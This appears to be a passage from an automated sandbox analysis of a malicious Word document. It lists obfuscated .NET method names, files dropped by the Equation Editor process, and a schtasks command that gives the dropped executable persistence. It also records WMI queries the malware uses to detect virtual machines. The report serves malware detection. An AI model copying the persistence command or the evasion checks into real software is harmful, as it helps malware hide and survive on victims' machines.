                Source: JxCmQoa.exe.4.dr, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.csHigh entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
                Source: JxCmQoa.exe.4.dr, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.csHigh entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
                Source: JxCmQoa.exe.4.dr, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.csHigh entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
                Source: JxCmQoa.exe.4.dr, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.csHigh entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.csHigh entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.csHigh entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.csHigh entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csHigh entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.csHigh entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.csHigh entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.csHigh entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.csHigh entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.csHigh entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.csHigh entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.csHigh entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csHigh entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.csHigh entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.csHigh entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.csHigh entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.csHigh entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.csHigh entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\merciesxdncdc.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile created: C:\Users\user\AppData\Roaming\JxCmQoa.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exeJump to dropped file

                Boot Survival:

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
